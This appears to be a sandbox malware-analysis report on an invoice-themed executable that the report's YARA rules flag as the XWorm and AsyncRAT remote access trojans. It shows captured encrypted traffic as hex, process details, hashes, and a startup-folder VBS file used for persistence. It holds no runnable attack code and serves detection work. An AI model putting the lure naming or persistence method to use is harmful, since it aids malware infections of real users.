62 17 f6 c2 94 4b 1d 86 2d e4 24 07 d9 9f 59 6e 44 6e 4c 9e f2 6b 13 43 56 5a a1 7c 25 0c b7 23 a0 9a a7 2c e3 44 24 d9 a9 54 97 18 f9 8a 01 fe 3d 51 9f c3 de 0c 58 7a cb 1a 65 4c 70 83 21 a4 65 12 a5 9c e3 6d c1 7e 12 09 37 1f 1a 2c 64 14 c4 e6 5f 7b 10 6d d7 28 22 21 fa c0 73 2d e5 a0 4b 94 c0 54 84 2a f3 02 34 3b 30 10 f6 df 50 bc 86 06 de 2f f6 6c 95 ad a4 3e 29 37 01 f1 c3 cb c8 02 7b 57 e7 13 02 af 70 0f 1a 77 cf 39 87 99 d2 02 c5 d5 ff fd 87 d3 69 4c 95 22 ba b5 f0 f7 b5 62 87 71 2a 5c db 45 07 3a ad [TRUNCATED] Data Ascii: aYL~R}>K@la3A&v1}ZR"v)L]v#c[)~Zj@^U'Ii-'!Tnr4Y1C994sR[hR'[CXN:"bK-$YnDnLkCVZ\|%#,D$T=QXzeLp!em~7,d_{m("!s-KT4;0P/l>)7{Wpw9iL"bq\E:{ WrT. E<f]<C\ x_\H@#4-/h(M6$z-\|n'yE%c(9oL)VREew6 n=S[G}\Sp-g&Ne%.K=6wy(\|NLN%h`-.0&}!1{X'2znfA8re_iN3GI_2]_4DSjKE<}cdY(f9ZRI,}UM<@#yG\|,5_%Xl m~<:dS[=\QkIY)4Ay\|mb1fCySt1Ycv4v0vwA,33r\|^1vr`pKTozzkMM3bn?,6hNAz)pP*Hym4>
Mar 10, 2025 09:03:15.734416008 CET	1236	IN	Data Raw: 18 b5 a0 af 1c a4 7b 90 f8 64 32 3c c4 15 c7 7d be fb 55 53 2c 88 47 64 95 86 89 a1 0f 45 5e 0f 07 ed b0 6d 2d 0f a7 86 10 ac 16 17 7f 16 52 3d 43 d4 47 0e d5 d0 08 1f 45 b1 39 aa c5 a0 e5 6e 0d ac ad 1e 1f 92 d6 12 77 83 63 50 76 c4 6c eb 9b d2 Data Ascii: {d2<}US,GdE^m-R=CGE9nwcPvlK~ESk1B6wtpy(0Mz"nM!jhsXN>uBw:]6pkwN$daust ;E/x4`P&]Z2GyKw/
Mar 10, 2025 09:03:15.734427929 CET	448	IN	Data Raw: 19 62 0e fc f1 17 df 06 f3 f4 36 0c a8 d9 43 6f 69 a9 8f 2a 26 60 f1 0a dd eb f3 43 96 64 0c 7a bb af 64 f8 3c 80 8e d2 96 e0 ba ce 28 18 e3 81 db 56 0e 2f 73 ce d0 75 bb 68 22 06 1a 62 f5 b6 3d 67 b2 66 b7 60 ce c9 0c 08 35 38 7b 74 f9 30 1b 4f Data Ascii: b6Coi*&`Cdzd<(V/suh"b=gf`58{t0O}uxm@yUF\^9"qp=p)?=e)y!M2m=ty"(Z0H8F_c.2j0$kk)Z+c.
Mar 10, 2025 09:03:15.734460115 CET	1236	IN	Data Raw: 09 6a eb 6a 5f 95 9b ba c4 1a d8 40 59 0e 0e 1c 10 cb d5 ba 55 b7 a5 23 a6 14 31 08 17 85 16 c5 bf 85 f2 79 bb 23 85 86 6f c7 de 9d d6 44 82 c7 af 94 d3 74 a0 ef 29 e9 f0 7d 77 a9 6b 4f fb 0e 8c ce 61 bc e9 31 b3 38 f6 6b 97 36 15 b7 24 05 c8 00 Data Ascii: jj_@YU#1y#oDt)}wkOa18k6$c\6(\|U%~8-N[l9K]N;1@Pry@3"o7S8/M{Ic?<CWO=Go/oLqJ&aXv}<5iHjUl
Mar 10, 2025 09:03:15.734571934 CET	1236	IN	Data Raw: e2 84 a9 9c 16 12 16 5a 23 c5 1e a5 af 45 42 15 b5 fd 1d ff 37 6b 32 1d 5c a3 4d de 68 cf ee 44 9a a6 21 cb 7e fa 05 ac 1b 4b 49 64 9b 26 7a 0f 57 5a f6 79 da 69 03 d5 41 f3 f0 84 e9 a0 36 11 bf 52 9a c4 5c 49 89 a9 2f 64 6b 86 88 35 f2 68 31 5a Data Ascii: Z#EB7k2\MhD!~KId&zWZyiA6R\I/dk5h1Z(;i' -i1$Q@[8jRu$/nW/}fL&ZHJJNV$jc9XzkE*j;DHNfyMo,,~ JLG(FbJ 4lamLf
Mar 10, 2025 09:03:15.734584093 CET	1236	IN	Data Raw: 4e 2e 76 88 6f 33 30 84 59 0d ea 05 36 55 39 07 fa d3 22 8b 2d 28 44 6a 22 03 26 64 81 ac ca bb 8b 0c 1e 25 4d 29 72 6a ea 80 03 4d a9 32 b9 b0 44 55 ec 81 e8 d5 0c 12 cc 47 4e b9 94 1f f3 00 53 60 01 e9 ac 26 64 b3 a0 6d e5 02 6f c0 f9 e8 88 10 Data Ascii: N.vo30Y6U9"-(Dj"&d%M)rjM2DUGNS`&dmo')aK^b,PGt>=vPut'#ajuT%={99,n)d](%I=_<SUN);1%75\|-b_?awaRiD^NQ
Mar 10, 2025 09:03:15.734595060 CET	1236	IN	Data Raw: 88 2a dc f2 4a a3 35 cb 4d a4 09 58 6a 58 df 20 a8 01 bc a2 7e af a3 c4 1c 91 21 36 e4 e6 c8 2c af 8b 55 69 63 92 6d 56 c3 69 ad 4d ab c9 8f 86 f8 3d 41 ad 88 69 fa 1d 5c d7 cd c6 8b 1c b0 f8 7e 2a 27 53 44 1c 7b 39 a9 e0 1e 1e 8b 69 79 77 af 3c Data Ascii: J5MXjX ~!6,UicmViM=Ai\~'SD{9iyw<QkXP-~f0e^g']q4fdW7(4K{5gxeR8DW` r l}om6w;IC!g-NUI^s*F"]=KScUHG-QX
Mar 10, 2025 09:03:15.734606981 CET	328	IN	Data Raw: 90 da c6 d5 34 64 d4 48 6f 20 a1 93 82 d5 73 c0 72 22 2a 6b 1a de 9a 81 41 7c 81 70 0d 68 6a 75 5c bc 02 15 3b f2 9f 2d 64 fe 04 89 11 15 29 5c 4f ff 2f 58 98 74 97 22 7e c3 60 ee 1b 0a 16 20 37 b9 76 0b ef b8 3c ef 61 72 b2 dd 8d f4 98 6e ff 9d Data Ascii: 4dHo sr"*kA\|phju\;-d)\O/Xt"~` 7v<arn3cw0.pU&JwfrwVDe_3j ir@Z.O5;,uA(sF}k^3_ .uS0l$yM1IF@mP>
Mar 10, 2025 09:03:15.734618902 CET	1236	IN	Data Raw: 5d 97 51 f4 b1 07 96 0a b2 6b 67 5c f2 3f 52 9f 8e de 03 fd 3a 10 44 ec c0 b6 38 01 7b 32 95 9f 0a b7 ed ca fd 7a a4 08 2a 8a 4c b6 0f 6a 8c f2 b0 49 d7 07 4d a8 47 63 33 26 8a 47 8d a2 01 6e 52 c9 cd 05 b4 e7 66 1d 56 28 37 1c 30 4a 9e 80 80 7b Data Ascii: ]Qkg\?R:D8{2zLjIMGc3&GnRfV(70J{xY]A\#H$)}vOIw:$cyg-3nFk:PXYfD8-9u'+fY(6=EI\|X*v!a@P)n#WnA4C
Mar 10, 2025 09:03:15.735038042 CET	1236	IN	Data Raw: 34 d2 81 25 ce ef 42 4b ad 7f dc d0 55 7f 2c d6 7a 73 f1 1e 3f d8 45 ef f5 19 d9 0c 09 14 1f fa 36 58 a8 b0 24 bb 87 6e 82 bb 8b d2 85 47 11 e5 52 a0 7f fb c2 0d 45 70 39 d2 f9 a0 73 45 44 31 db a4 80 65 c6 2c cb 71 64 7b 0b 7a 05 63 d1 98 88 68 Data Ascii: 4%BKU,zs?E6X$nGREp9sED1e,qd{zche>{/6HD&nD=u"-V[DyI^<J=NMGRkFP;!pYlWX;//fPz8vc%tlCZ
Mar 10, 2025 09:03:15.740833044 CET	1236	IN	Data Raw: 8c 0c 66 55 28 c7 74 60 69 3c c8 8a ce b7 09 84 20 39 70 86 5e d8 cd 1d b3 dd 6a 03 8e 6f 48 ec 3f 03 86 f4 1e 22 a0 e3 0a c2 07 eb 85 d0 24 2b dd 6c 0d 78 96 af 85 ea 63 f4 f5 ef c6 83 eb 24 66 0b 63 8c 18 96 60 5a dc 5e 78 ff 07 87 7a 8d 96 de Data Ascii: fU(t`i< 9p^joH?"$+lxc$fc`Z^xzt?c9Ydc{hb)PoFw`#pP@mp7zPI-st\|&\|1v#.@e@+dk.w6.g,wi)n#b*7}X4%W_

Target ID:	0
Start time:	04:03:13
Start date:	10/03/2025
Path:	C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe"
Imagebase:	0xc10000
File size:	16'384 bytes
MD5 hash:	31F1E66669C6784C4BAAE3C060A8C662
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1338699571.0000000003487000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1338699571.0000000003487000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1348558410.0000000003EA8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1351995919.00000000062A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1338699571.0000000002ECE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1338699571.0000000002ECE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1338699571.0000000002ECE000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	04:03:27
Start date:	10/03/2025
Path:	C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\COHC INVOI NO 2500385 .exe"
Imagebase:	0xc40000
File size:	16'384 bytes
MD5 hash:	31F1E66669C6784C4BAAE3C060A8C662
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000002.2448321976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.2448321976.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	04:03:31
Start date:	10/03/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1136 -s 936
Imagebase:	0xd0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report COHC INVOI NO 2500385 .exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Count.exe

C:\Users\user\AppData\Roaming\Count.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Windows Analysis Report
COHC INVOI NO 2500385 .exe